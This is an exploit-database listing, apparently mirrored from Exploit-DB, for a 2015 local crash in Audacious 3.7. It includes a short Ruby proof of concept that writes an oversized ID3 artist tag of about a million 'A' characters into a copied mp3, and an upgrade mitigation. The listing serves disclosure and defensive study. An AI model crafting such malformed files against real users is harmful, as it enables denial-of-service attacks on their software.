header-logo
Suggest Exploit
vendor:
Audacious
by:
Antonio Z.
7,5
CVSS
HIGH
Local Crash
119
CWE
Product Name: Audacious
Affected Version From: 3.7
Affected Version To: 3.7
Patch Exists: YES
Related CWE: N/A
CPE: audacious-media-player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64, Debian 8.2 x86-x64
2015

Audacious 3.7 ID3 Local Crash PoC

This exploit is for Audacious 3.7 and is a local crash PoC. It creates a copy of a test mp3 file and then uses the Mp3Info library to set the artist tag to a string of 1048576 'A' characters. This causes the application to crash when the file is opened.

Mitigation:

Upgrade to the latest version of Audacious.
Source

Exploit-DB raw data:

# Exploit Title: Audacious 3.7 ID3 Local Crash PoC
# Date: 11-20-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://audacious-media-player.org/
# Software Link: http://audacious-media-player.org/download | http://distfiles.audacious-media-player.org/audacious-3.7-win32.zip
# Version: 3.7
# Tested on: Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64, Debian 8.2 x86-x64
# Comment: Issue was reported: http://redmine.audacious-media-player.org/issues/595

require 'fileutils'
require 'mp3info'

evil = 'A' * 1048576

FileUtils.cp 'Test_Case.mp3', 'Test_Case_PoC.mp3'

Mp3Info.open('Test_Case_PoC.mp3') do |mp3|
  mp3.tag.artist = evil
end

Navigation

Suggest Exploit

Services By CQR